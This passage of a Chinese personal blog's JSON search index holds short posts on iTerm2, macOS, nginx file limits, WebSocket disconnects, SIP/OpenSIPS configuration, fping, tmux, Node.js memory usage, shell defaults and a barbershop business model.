start的输入框,这个输入框,就是要执行的ssh指令,里面包含了远程host的地址。\n然后你就可以在Profils的菜单中选择一个profile进行连接了。\n如何让tab页面的标题不改变? 一定不要勾选Applications in terminal may change the title, 默认这项是勾选的。 Ttile一定要选择Name, badge的妙用? 
如果标签页的tab的名称还不够强调当前tab页面是连接哪个标签页面的,你可以用用Badge去强调一下。","title":"iTerm2技巧 维护多个host与固定tab页面标题"},{"content":" 首先去官网查看一下,macos的系统版本和硬件以及ipad的版本是否支持随航。这是前提条件。 macos 和 ipad 需要登录同一个AppleID macos和iPad需要在同一个Wi-Fi下 遇到报错提示链接超时时:\nMacOS 退出apple账号,然后重新登录,登录完了之后重启电脑 再次尝试连接,就可以连接成功了。\n","permalink":"https://wdd.js.org/posts/2020/06/yh0oty/","summary":"首先去官网查看一下,macos的系统版本和硬件以及ipad的版本是否支持随航。这是前提条件。 macos 和 ipad 需要登录同一个AppleID macos和iPad需要在同一个Wi-Fi下 遇到报错提示链接超时时:\nMacOS 退出apple账号,然后重新登录,登录完了之后重启电脑 再次尝试连接,就可以连接成功了。","title":"MacOS 随航功能链接ipad超时"},{"content":"macos 升级后,发现git等命令都不可用了。\n第一次使用xcode-select \u0026ndash;install, 有报错。于是就用brew 安装了git。\nxcode-select --install 后续使用其他命令是,发现gcc命令也不可用。于是第二天又用 xcode-select --install 执行了一遍,忽然又可以正常安装开发软件了。\n所以又把brew 安装的git给卸载了。\n","permalink":"https://wdd.js.org/posts/2020/06/wetv3e/","summary":"macos 升级后,发现git等命令都不可用了。\n第一次使用xcode-select \u0026ndash;install, 有报错。于是就用brew 安装了git。\nxcode-select --install 后续使用其他命令是,发现gcc命令也不可用。于是第二天又用 xcode-select --install 执行了一遍,忽然又可以正常安装开发软件了。\n所以又把brew 安装的git给卸载了。","title":"xcrun: error: invalid active developer path"},{"content":"最近遇到一个问题,WebSocket总是会在下午出现比较大的断开的量。\n首先怀疑的是客户端的网络到服务端的网络出现抖动或者断开,要么就是入口的nginx有异常,或者是内部的服务出现异常。\n排查下来,发现nginx的最大打开文件个数是1024\nnginx master进程\nnginx work进程\n当进程打开文件数超过限制时,会发生什么? 当进程超过最大打开文件限制时,会收到SIGXFSZ信号。这个信号会默认行为会杀死一个进程。进程内部也可以捕获这个信号。\n我试着向nginx wrok进程发送SIGXFSZ信号, work进程会退出,然后master监听了这个事件后,会重新启动一个work进程。\nkill -XFSZ work_pid 在nginx的error.log文件中,可以看到类似的日志输出。\n这里的25就是XFSZ信号的整数表示。\n... [alert] ...#.: work process ... 
exited on signal 25\n参考 https://www.monitis.com/blog/6-best-practices-for-optimizing-your-nginx-performance/ https://www.cnblogs.com/shansongxian/p/9989631.html https://www.cnblogs.com/jpfss/p/9755706.html https://man7.org/linux/man-pages/man2/getrlimit.2.html https://man7.org/linux/man-pages/man5/proc.5.html ","permalink":"https://wdd.js.org/posts/2020/06/rlmqq8/","summary":"最近遇到一个问题,WebSocket总是会在下午出现比较大的断开的量。\n首先怀疑的是客户端的网络到服务端的网络出现抖动或者断开,要么就是入口的nginx有异常,或者是内部的服务出现异常。\n排查下来,发现nginx的最大打开文件个数是1024\nnginx master进程\nnginx work进程\n当进程打开文件数超过限制时,会发生什么? 当进程超过最大打开文件限制时,会收到SIGXFSZ信号。这个信号的默认行为会杀死一个进程。进程内部也可以捕获这个信号。\n我试着向nginx work进程发送SIGXFSZ信号, work进程会退出,然后master监听了这个事件后,会重新启动一个work进程。\nkill -XFSZ work_pid 在nginx的error.log文件中,可以看到类似的日志输出。\n这里的25就是XFSZ信号的整数表示。\n... [alert] ...#.: work process ... exited on signal 25\n参考 https://www.monitis.com/blog/6-best-practices-for-optimizing-your-nginx-performance/ https://www.cnblogs.com/shansongxian/p/9989631.html https://www.cnblogs.com/jpfss/p/9755706.html https://man7.org/linux/man-pages/man2/getrlimit.2.html https://man7.org/linux/man-pages/man5/proc.5.html ","title":"生产环境nginx配置"},{"content":"调研目的 在异常情况下,网络断开对WebSocket的影响 测试代码 测试代码没有心跳机制 心跳机制并不包含在WebSocket协议内部 var ws = new WebSocket(\u0026#39;wss://echo.websocket.org/\u0026#39;) ws.onopen =function(e){ console.log(\u0026#39;onopen\u0026#39;) } ws.onerror = function (e) { console.log(\u0026#39;onerror: \u0026#39; + e.code) console.log(e) } ws.onclose = function (e) { console.log(\u0026#39;onclose: \u0026#39; + e.code) console.log(e) } 场景1: 断网后,是否会立即触发onerror, 或者onclose事件? 答案:不会立即触发\n测试代码中没有心跳机制,断网后,并不会立即触发onerror或者onclose的回调函数。\n个人测试的情况\n机器 测试场景 Macbook pro chrome 83.0.4103.106 每隔10秒发送一次消息的情况下,40秒后触发onclose事件 Macbook pro chrome 83.0.4103.106 一直不发送消息,一直就不会触发onclose事件 Macbook pro chrome 83.0.4103.106 发出一个消息后? 场景2: 断网后,使用send()发送数据,会触发事件吗? 为什么无法准确拿到断开原因? 
WebSocket关闭事件中有三个属性\ncode 断开原因码 reason 具体原因 wasClean 是否是正常断开 官方文档上,code字段有很多个值。但是大多数情况下,要么拿到的值是undefined, 要么是1006,基本上没有其他情况。\n这并不是浏览器的bug, 这是浏览器故意这样做的。在w3c的官方文档上给出的原因其实是出于安全的考虑。\n试想一下,如果把断开原因给得非常具体,那么一个恶意的js脚本就有可能做端口扫描或者恶意的注入。\nUser agents must not convey any failure information to scripts in a way that would allow a script to distinguish the following situations:\nA server whose host name could not be resolved.\nA server to which packets could not successfully be routed.\nA server that refused the connection on the specified port.\nA server that failed to correctly perform a TLS handshake (e.g., the server certificate can\u0026rsquo;t be verified).\nA server that did not complete the opening handshake (e.g. because it was not a WebSocket server).\nA WebSocket server that sent a correct opening handshake, but that specified options that caused the client to drop the connection (e.g. the server specified a subprotocol that the client did not offer).\nA WebSocket server that abruptly closed the connection after successfully completing the opening handshake.\nIn all of these cases, the WebSocket connection close code would be 1006, as required by the WebSocket Protocol specification. [WSP]\nAllowing a script to distinguish these cases would allow a script to probe the user\u0026rsquo;s local network in preparation for an attack. https://www.w3.org/TR/websockets/%23concept-websocket-close-fail\n","permalink":"https://wdd.js.org/posts/2020/06/sbhglg/","summary":"调研目的 在异常情况下,网络断开对WebSocket的影响 测试代码 测试代码没有心跳机制 心跳机制并不包含在WebSocket协议内部 var ws = new WebSocket(\u0026#39;wss://echo.websocket.org/\u0026#39;) ws.onopen =function(e){ console.log(\u0026#39;onopen\u0026#39;) } ws.onerror = function (e) { console.log(\u0026#39;onerror: \u0026#39; + e.code) console.log(e) } ws.onclose = function (e) { console.log(\u0026#39;onclose: \u0026#39; + e.code) console.log(e) } 场景1: 断网后,是否会立即触发onerror, 或者onclose事件? 
答案:不会立即触发\n测试代码中没有心跳机制,断网后,并不会立即触发onerror或者onclose的回调函数。\n个人测试的情况\n机器 测试场景 Macbook pro chrome 83.0.4103.106 每隔10秒发送一次消息的情况下,40秒后触发onclose事件 Macbook pro chrome 83.0.4103.106 一直不发送消息,一直就不会触发onclose事件 Macbook pro chrome 83.0.4103.106 发出一个消息后? 场景2: 断网后,使用send()发送数据,会触发事件吗? 为什么无法准确拿到断开原因? WebSocket关闭事件中有三个属性\ncode 断开原因码 reason 具体原因 wasClean 是否是正常断开 官方文档上,code字段有很多个值。但是大多数情况下,要么拿到的值是undefined, 要么是1006,基本上没有其他情况。","title":"[未完成] WebSocket调研"},{"content":"一般的sip网关同时具有信令和媒体处理的能力,如下图。\n但是也有信令和媒体分开的网关。在和网关信令交互过程中,网关会将媒体地址放到sdp中。\n难点就来了,在nat存在的场景下,你并不知道sdp里的媒体地址是否是真实的地址。\n那么你就要选择,是相信sdp中的媒体地址,还是把sip信令的源ip作为媒体地址呢?\n","permalink":"https://wdd.js.org/opensips/ch1/sip-rtp-path/","summary":"一般的sip网关同时具有信令和媒体处理的能力,如下图。\n但是也有信令和媒体分开的网关。在和网关信令交互过程中,网关会将媒体地址放到sdp中。\n难点就来了,在nat存在的场景下,你并不知道sdp里的媒体地址是否是真实的地址。\n那么你就要选择,是相信sdp中的媒体地址,还是把sip信令的源ip作为媒体地址呢?","title":"媒体路径与信令路径"},{"content":"1. 简介 媒体协商用来交换呼叫双方的媒体能力。如\n支持的编码类型有哪些 采样频率是多少 媒体端口,ip 信息 \u0026hellip; 媒体协商使用的是请求和应答模型。即一方向另一方发送含有 sdp 信息的消息,然后另一方根据对方提供的编码以及自己支持的编码,如果协商成功,则将协商后的消息 sdp 再次发送给对方。\n2. 常见的几个协商方式 2.1 在 INVITE 中 offer 2.2 在 200 OK 中 offer 2.3 在 UPDATE 中 offer 2.4 在 PRACK 中 offer 3. 
常见的几个问题 一般呼叫到中继侧时,中继回的 183 信令是会携带 sdp 信息的 一般打到分机时,分机回的 180 信令是没有 sdp 信息的 不要先入为主的认为,某些请求一定带有 sdp,某些请求一定没有 sdp。而应当去测试请求或者响应消息上有没有携带 sdp 信息。\n携带 sdp 信息的 sip 消息会出现下面的头\nContent-Type: application/sdp ","permalink":"https://wdd.js.org/opensips/ch1/offer-answer/","summary":"1. 简介 媒体协商用来交换呼叫双方的媒体能力。如\n支持的编码类型有哪些 采样频率是多少 媒体端口,ip 信息 \u0026hellip; 媒体协商使用的是请求和应答模型。即一方向另一方发送含有 sdp 信息的消息,然后另一方根据对方提供的编码以及自己支持的编码,如果协商成功,则将协商后的消息 sdp 再次发送给对方。\n2. 常见的几个协商方式 2.1 在 INVITE 中 offer 2.2 在 200 OK 中 offer 2.3 在 UPDATE 中 offer 2.4 在 PRACK 中 offer 3. 常见的几个问题 一般呼叫到中继侧时,中继回的 183 信令是会携带 sdp 信息的 一般打到分机时,分机回的 180 信令是没有 sdp 信息的 不要先入为主的认为,某些请求一定带有 sdp,某些请求一定没有 sdp。而应当去测试请求或者响应消息上有没有携带 sdp 信息。\n携带 sdp 信息的 sip 消息会出现下面的头\nContent-Type: application/sdp ","title":"媒体协商 offer/answer模型"},{"content":"Decode As Udp wireshark 有时候并不能把udp包识别为rtp包,所以这边可能需要手动设置解码方式\n","permalink":"https://wdd.js.org/opensips/tools/wireshark-player-pcap/","summary":"Decode As Udp wireshark 有时候并不能把udp包识别为rtp包,所以这边可能需要手动设置解码方式","title":"wireshark 播放抓包文件"},{"content":"新建一个文件 ip.list.cfg, 包含所有的待测试的ip地址。\n192.168.40.20 192.168.40.21 执行命令:\nnohup fping -D -u -l -p 2000 -f ip.list.cfg \u0026amp; -D 显示时间戳 -u 显示不可达的目标 -l 持续的ping -p 每隔多少毫秒执行一次 -f 指定ip列表文件 在nohup.out中,会持续地显示到各个ip的网络状况。\n[1592643928.961414] 192.168.40.20 : [0], 84 bytes, 3.22 ms (3.22 avg, 0% loss) [1592643928.969987] 192.168.40.21 : [0], 84 bytes, 1.22 ms (1.22 avg, 0% loss) [1592643930.965753] 192.168.40.20 : [1], 84 bytes, 5.25 ms (4.23 avg, 0% loss) [1592643930.972833] 192.168.40.21 : [1], 84 bytes, 1.14 ms (1.18 avg, 0% loss) [1592643932.965636] 192.168.40.20 : [2], 84 bytes, 3.45 ms (3.97 avg, 0% loss) [1592643932.978245] 192.168.40.21 : [2], 84 bytes, 4.39 ms (2.25 avg, 0% loss) [1592643934.991354] 192.168.40.20 : [3], 84 bytes, 27.9 ms (9.96 avg, 0% loss) [1592643934.991621] 192.168.40.21 : [3], 84 bytes, 14.9 ms (5.42 avg, 0% loss) [1592643936.978135] 192.168.40.20 : [4], 84 bytes, 11.3 ms (10.2 avg, 0% loss) [1592643936.979620] 192.168.40.21 : [4], 84 bytes, 1.37 ms (4.61 avg, 0% loss) ","permalink":"https://wdd.js.org/posts/2020/06/qtdzvr/","summary":"新建一个文件 ip.list.cfg, 包含所有的待测试的ip地址。\n192.168.40.20 192.168.40.21 执行命令:\nnohup fping -D -u -l -p 2000 -f ip.list.cfg \u0026amp; -D 显示时间戳 -u 显示不可达的目标 -l 持续的ping -p 每隔多少毫秒执行一次 -f 指定ip列表文件 在nohup.out中,会持续地显示到各个ip的网络状况。\n[1592643928.961414] 192.168.40.20 : [0], 84 bytes, 3.22 ms (3.22 avg, 0% loss) [1592643928.969987] 192.168.40.21 : [0], 84 bytes, 1.22 ms (1.22 avg, 0% loss) [1592643930.965753] 192.168.40.20 : [1], 84 bytes, 5.25 ms (4.23 
avg, 0% loss) [1592643930.972833] 192.168.40.21 : [1], 84 bytes, 1.14 ms (1.","title":"fping 网络状态监控测试"},{"content":".zshrc配置 vim ~/.zshrc plugins=(git tmux) # 加入tmux, 然后保存退出 source ~/.zshrc tmux 快捷键 Alias Command Description ta tmux attach -t Attach new tmux session to already running named session tad tmux attach -d -t Detach named tmux session ts tmux new-session -s Create a new named tmux session tl tmux list-sessions Displays a list of running tmux sessions tksv tmux kill-server Terminate all running tmux sessions tkss tmux kill-session -t Terminate named running tmux session tmux _zsh_tmux_plugin_run Start a new tmux session ","permalink":"https://wdd.js.org/posts/2020/06/rh9zsc/","summary":".zshrc配置 vim ~/.zshrc plugins=(git tmux) # 加入tmux, 然后保存退出 source ~/.zshrc tmux 快捷键 Alias Command Description ta tmux attach -t Attach new tmux session to already running named session tad tmux attach -d -t Detach named tmux session ts tmux new-session -s Create a new named tmux session tl tmux list-sessions Displays a list of running tmux sessions tksv tmux kill-server Terminate all running tmux sessions tkss tmux kill-session -t Terminate named running tmux session tmux _zsh_tmux_plugin_run Start a new tmux session ","title":"oh-my-zsh 安装 tmux插件"},{"content":"GC释放时机 当HeapUsed接近最大堆内存时,出发GC释放。 下图是深夜,压力比较小的时候。 下图是上午工作时间\n内存泄漏 OOM ","permalink":"https://wdd.js.org/fe/nodejs-gc-times/","summary":"GC释放时机 当HeapUsed接近最大堆内存时,出发GC释放。 下图是深夜,压力比较小的时候。 下图是上午工作时间\n内存泄漏 OOM ","title":"Nodejs Gc Times"},{"content":"","permalink":"https://wdd.js.org/posts/2020/06/elg2v2/","summary":"","title":"Nodejs诊断报告"},{"content":"process.memoryUsage() { rss: 4935680, heapTotal: 1826816, heapUsed: 650472, external: 49879, arrayBuffers: 9386 } heapTotal 和 heapUsed指向V8\u0026rsquo;s 内存使用 external 指向 C++ 对象的内存使用, C++对象绑定js对象,并且由V8管理 rss, 实际占用内存,包括C++, js对象和代码三块的总计。使用 ps aux命令输出时,rss的值对应了RSS列的数值 node js 所有buffer占用的内存 heapTotal and heapUsed refer to V8\u0026rsquo;s memory usage. 
external refers to the memory usage of C++ objects bound to JavaScript objects managed by V8. rss, Resident Set Size, is the amount of space occupied in the main memory device (that is a subset of the total allocated memory) for the process, including all C++ and JavaScript objects and code. arrayBuffers refers to memory allocated for ArrayBuffers and SharedArrayBuffers, including all Node.js Buffers. This is also included in the external value. When Node.js is used as an embedded library, this value may be 0 because allocations for ArrayBuffers may not be tracked in that case. process.resourceUsage() userCPUTime maps to ru_utime computed in microseconds. It is the same value as process.cpuUsage().user. systemCPUTime maps to ru_stime computed in microseconds. It is the same value as process.cpuUsage().system. maxRSS maps to ru_maxrss which is the maximum resident set size used in kilobytes. sharedMemorySize maps to ru_ixrss but is not supported by any platform. unsharedDataSize maps to ru_idrss but is not supported by any platform. unsharedStackSize maps to ru_isrss but is not supported by any platform. minorPageFault maps to ru_minflt which is the number of minor page faults for the process, see this article for more details. majorPageFault maps to ru_majflt which is the number of major page faults for the process, see this article for more details. This field is not supported on Windows. swappedOut maps to ru_nswap but is not supported by any platform. fsRead maps to ru_inblock which is the number of times the file system had to perform input. fsWrite maps to ru_oublock which is the number of times the file system had to perform output. ipcSent maps to ru_msgsnd but is not supported by any platform. ipcReceived maps to ru_msgrcv but is not supported by any platform. signalsCount maps to ru_nsignals but is not supported by any platform. 
voluntaryContextSwitches maps to ru_nvcsw which is the number of times a CPU context switch resulted due to a process voluntarily giving up the processor before its time slice was completed (usually to await availability of a resource). This field is not supported on Windows. involuntaryContextSwitches maps to ru_nivcsw which is the number of times a CPU context switch resulted due to a higher priority process becoming runnable or because the current process exceeded its time slice. This field is not supported on Windows. console.log(process.resourceUsage()); /* Will output: { userCPUTime: 82872, systemCPUTime: 4143, maxRSS: 33164, sharedMemorySize: 0, unsharedDataSize: 0, unsharedStackSize: 0, minorPageFault: 2469, majorPageFault: 0, swappedOut: 0, fsRead: 0, fsWrite: 8, ipcSent: 0, ipcReceived: 0, signalsCount: 0, voluntaryContextSwitches: 79, involuntaryContextSwitches: 1 } */ ","permalink":"https://wdd.js.org/fe/nodejs-mem-usage/","summary":"process.memoryUsage() { rss: 4935680, heapTotal: 1826816, heapUsed: 650472, external: 49879, arrayBuffers: 9386 } heapTotal 和 heapUsed指向V8\u0026rsquo;s 内存使用 external 指向 C++ 对象的内存使用, C++对象绑定js对象,并且由V8管理 rss, 实际占用内存,包括C++, js对象和代码三块的总计。使用 ps aux命令输出时,rss的值对应了RSS列的数值 node js 所有buffer占用的内存 heapTotal and heapUsed refer to V8\u0026rsquo;s memory usage. external refers to the memory usage of C++ objects bound to JavaScript objects managed by V8. 
rss, Resident Set Size, is the amount of space occupied in the main memory device (that is a subset of the total allocated memory) for the process, including all C++ and JavaScript objects and code.","title":"Nodejs Mem Usage"},{"content":"v8内存模型 Code Segment: 代码被实际执行 Stack 本地变量 指向引用的变量 流程控制,例如函数 Heap V8负责管理 HeapTotal 堆的总大小 HeapUsed 实际使用的大小 Shallow size of an object: 对象自身占用的内存 Retained size of an object: 对象及其依赖对象删除后回释放的内存 ","permalink":"https://wdd.js.org/fe/nodejs-memory-model/","summary":"v8内存模型 Code Segment: 代码被实际执行 Stack 本地变量 指向引用的变量 流程控制,例如函数 Heap V8负责管理 HeapTotal 堆的总大小 HeapUsed 实际使用的大小 Shallow size of an object: 对象自身占用的内存 Retained size of an object: 对象及其依赖对象删除后回释放的内存 ","title":"Nodejs Memory Model"},{"content":"从各种层次排查了问题,包括\ndocker版本不一样 脚本不一样 镜像的问题 \u0026hellip; 从各种角度排查过后,却发现,问题在是拼写错误。环境变量没有设置对,导致进程无法前台运行。\n能不拼写就不要拼写!!直接复制。\n大文件在传输图中可能会文件损坏,最好使用md5sum计算文件校验和,然后做对比。\n","permalink":"https://wdd.js.org/posts/2020/06/ghpbm9/","summary":"从各种层次排查了问题,包括\ndocker版本不一样 脚本不一样 镜像的问题 \u0026hellip; 从各种角度排查过后,却发现,问题在是拼写错误。环境变量没有设置对,导致进程无法前台运行。\n能不拼写就不要拼写!!直接复制。\n大文件在传输图中可能会文件损坏,最好使用md5sum计算文件校验和,然后做对比。","title":"解决问题的最后一个思路:拼写错误!!"},{"content":" webrtc的各种demo https://webrtc.github.io/samples/ 在线音频处理 https://audiomass.co/ 值得深入阅读,关于如何demo的思考 https://kitsonkelly.com/posts/deno-is-a-browser-for-code/ 不错的介绍demo的博客 https://kitsonkelly.com/posts js如何获取音频视频 https://www.webdevdrops.com/en/how-to-access-device-cameras-with-javascript/ bats可以用来测试shell脚本 https://github.com/bats-core/bats-core 手绘风格的流程图 https://excalidraw.com/ ","permalink":"https://wdd.js.org/posts/2020/06/gbm9n6/","summary":" webrtc的各种demo https://webrtc.github.io/samples/ 在线音频处理 https://audiomass.co/ 值得深入阅读,关于如何demo的思考 https://kitsonkelly.com/posts/deno-is-a-browser-for-code/ 不错的介绍demo的博客 https://kitsonkelly.com/posts js如何获取音频视频 https://www.webdevdrops.com/en/how-to-access-device-cameras-with-javascript/ bats可以用来测试shell脚本 https://github.com/bats-core/bats-core 手绘风格的流程图 https://excalidraw.com/ ","title":"01 
手绘风格的流程图"},{"content":"用法 Parameter What does it do? ${VAR:-STRING} If VAR is empty or unset, use STRING as its value. ${VAR-STRING} If VAR is unset, use STRING as its value. ${VAR:=STRING} If VAR is empty or unset, set the value of VAR to STRING. ${VAR=STRING} If VAR is unset, set the value of VAR to STRING. ${VAR:+STRING} If VAR is not empty, use STRING as its value. ${VAR+STRING} If VAR is set, use STRING as its value. ${VAR:?STRING} Display an error if empty or unset. ${VAR?STRING} Display an error if unset. 例子 执行下面的例子,如果环境变量中 CONF 的值存在,则取 CONF 的值,否则用默认值 7\n#/bin/bash a=${CONF:-\u0026#34;7\u0026#34;} echo $a; ","permalink":"https://wdd.js.org/shell/default-var/","summary":"用法 Parameter What does it do? ${VAR:-STRING} If VAR is empty or unset, use STRING as its value. ${VAR-STRING} If VAR is unset, use STRING as its value. ${VAR:=STRING} If VAR is empty or unset, set the value of VAR to STRING. ${VAR=STRING} If VAR is unset, set the value of VAR to STRING. ${VAR:+STRING} If VAR is not empty, use STRING as its value. ${VAR+STRING} If VAR is set, use STRING as its value.","title":"设置变量默认值"},{"content":"1. 理发店分类 类别 店面大小 并发理发人数 业务范围 消费者画像 定价 A(单一理发类) 较小 4-6 理发、染发、烫发 学生、普通工人 较低 B(综合服务类) 较大 12-20 理发、染发、烫发、美容、减肥、刮痧、按摩、脱毛等等 白领、老板等有一定经济能力者 中上 2. 如何吸引顾客上门? 优惠卡:在理发店营业之前,往往可以以极低的价格,派发理发卡。例如办理20元理发5次这样的理发卡。这样在理发店营业之初,就会有足够的客户上门理发。 认知偏差:很多理发店会门口挂个横幅: x+x+x 仅需5元。全场套餐仅需1折。其实这些都是吸引顾客的钩子,而真正的前提条件,往往是要办理xxxx元的会员卡。 3. 如何吸引客户更多的消费? 对于B类理发店来说,一般情况下顾客进店之后,并不会对其立即理发。而需要一位服务员进行理发前的准备,例如头部按摩、颈部刮痧、肩部按摩的放松准备。也可能会上一些茶水,糖果瓜子之类的食品。\n进入理发店,除了有理发的消费之外,还可能纯在其他的消费机会。而消费机会的前提在于**服务人员和顾客之间的沟通。所以以为能够察言寡色的服务员则显得尤为重要。如果顾客一句话也不说,那也是无法让其更多的消费的。常见的沟通手法如下:\n发现顾客身上的小瑕疵,进而咨询顾客是否需要专业的人员帮您看看。(注意这一步一定不要立即推荐套餐服务,这样会立即引起顾客的反感情绪。) 经过专业人员的查看之后,一般会向客户推荐比较优惠的体验一次的项目。因为体验一次往往是话费比较小的。如果上来给客户推荐一两千的套餐,客户一般会拒绝。 简单的套餐体验过后,可以向顾客推荐套餐,以及如果使用套餐,单次理疗会更加优惠。 总得理念就是:循序渐诱,不可操之过急\n4. 如何留住顾客? 理发店顾客粘性一般比较小,周围四五家理发店,顾客凭什么再次光顾你这家呢?\n答案就是:会员卡\n","permalink":"https://wdd.js.org/posts/2020/05/frut12/","summary":"1. 
理发店分类 类别 店面大小 并发理发人数 业务范围 消费者画像 定价 A(单一理发类) 较小 4-6 理发、染发、烫发 学生、普通工人 较低 B(综合服务类) 较大 12-20 理发、染发、烫发、美容、减肥、刮痧、按摩、脱毛等等 白领、老板等有一定经济能力者 中上 2. 如何吸引顾客上门? 优惠卡:在理发店营业之前,往往可以以极低的价格,派发理发卡。例如办理20元理发5次这样的理发卡。这样在理发店营业之初,就会有足够的客户上门理发。 认知偏差:很多理发店会门口挂个横幅: x+x+x 仅需5元。全场套餐仅需1折。其实这些都是吸引顾客的钩子,而真正的前提条件,往往是要办理xxxx元的会员卡。 3. 如何吸引客户更多的消费? 对于B类理发店来说,一般情况下顾客进店之后,并不会对其立即理发。而需要一位服务员进行理发前的准备,例如头部按摩、颈部刮痧、肩部按摩的放松准备。也可能会上一些茶水,糖果瓜子之类的食品。\n进入理发店,除了有理发的消费之外,还可能纯在其他的消费机会。而消费机会的前提在于**服务人员和顾客之间的沟通。所以以为能够察言寡色的服务员则显得尤为重要。如果顾客一句话也不说,那也是无法让其更多的消费的。常见的沟通手法如下:\n发现顾客身上的小瑕疵,进而咨询顾客是否需要专业的人员帮您看看。(注意这一步一定不要立即推荐套餐服务,这样会立即引起顾客的反感情绪。) 经过专业人员的查看之后,一般会向客户推荐比较优惠的体验一次的项目。因为体验一次往往是话费比较小的。如果上来给客户推荐一两千的套餐,客户一般会拒绝。 简单的套餐体验过后,可以向顾客推荐套餐,以及如果使用套餐,单次理疗会更加优惠。 总得理念就是:循序渐诱,不可操之过急\n4. 如何留住顾客? 理发店顾客粘性一般比较小,周围四五家理发店,顾客凭什么再次光顾你这家呢?\n答案就是:会员卡","title":"理发店的营业模式分析"},{"content":"opensips 1.x 使用各种flag去设置一个呼叫是否需要记录。从opensips 2.2开始,不再使用flag的方式,而使用 do_accounting() 函数去标记是否需要记录呼叫。\n注意 do_accounting()函数并不是收到SIP消息后立即写呼叫记录,也仅仅是做一个标记。实际的写数据库或者写日志发生在事务或者dialog完成的时候。\n","permalink":"https://wdd.js.org/opensips/ch6/acc/","summary":"opensips 1.x 使用各种flag去设置一个呼叫是否需要记录。从opensips 2.2开始,不再使用flag的方式,而使用 do_accounting() 函数去标记是否需要记录呼叫。\n注意 do_accounting()函数并不是收到SIP消息后立即写呼叫记录,也仅仅是做一个标记。实际的写数据库或者写日志发生在事务或者dialog完成的时候。","title":"acc呼叫记录模块"},{"content":"# # this example shows how to use forking on failure # log_level=3 log_stderror=1 listen=192.168.2.16 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many 
Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # skip register for testing purposes if (is_method(\u0026#34;REGISTER\u0026#34;)) { sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); exit; }; if (is_method(\u0026#34;INVITE\u0026#34;)) { seturi(\u0026#34;sip:xxx@192.168.2.16:5064\u0026#34;); # if transaction broken, try an alternative route t_on_failure(\u0026#34;1\u0026#34;); # if a provisional came, stop alternating t_on_reply(\u0026#34;1\u0026#34;); }; t_relay(); } failure_route[1] { log(1, \u0026#34;trying at alternate destination\\n\u0026#34;); seturi(\u0026#34;sip:yyy@192.168.2.16:5064\u0026#34;); t_relay(); } onreply_route[1] { log(1, \u0026#34;reply came in\\n\u0026#34;); if ($rs=~\u0026#34;18[0-9]\u0026#34;) { log(1, \u0026#34;provisional -- resetting negative failure\\n\u0026#34;); t_on_failure(\u0026#34;0\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/serial-183/","summary":"# # this example shows how to use forking on failure # log_level=3 log_stderror=1 listen=192.168.2.16 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # skip register for testing purposes if (is_method(\u0026#34;REGISTER\u0026#34;)) { 
sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); exit; }; if (is_method(\u0026#34;INVITE\u0026#34;)) { seturi(\u0026#34;sip:xxx@192.","title":"serial_183"},{"content":"# # demo script showing how to set-up usrloc replication # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=yes # (cmd line: -E) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # digest generation secret; use the same in backup server; # also, make sure that the backup server has sync\u0026#39;ed time modparam(\u0026#34;auth\u0026#34;, \u0026#34;secret\u0026#34;, \u0026#34;alsdkhglaksdhfkloiwr\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # if the request is for other domain use UsrLoc # (in case, it does not work, use the following command # with proper names and addresses in it) if (is_myself(\u0026#34;$rd\u0026#34;)) { if ($rm==\u0026#34;REGISTER\u0026#34;) { # verify credentials if (!www_authorize(\u0026#34;foo.bar\u0026#34;, \u0026#34;subscriber\u0026#34;)) { www_challenge(\u0026#34;foo.bar\u0026#34;, 
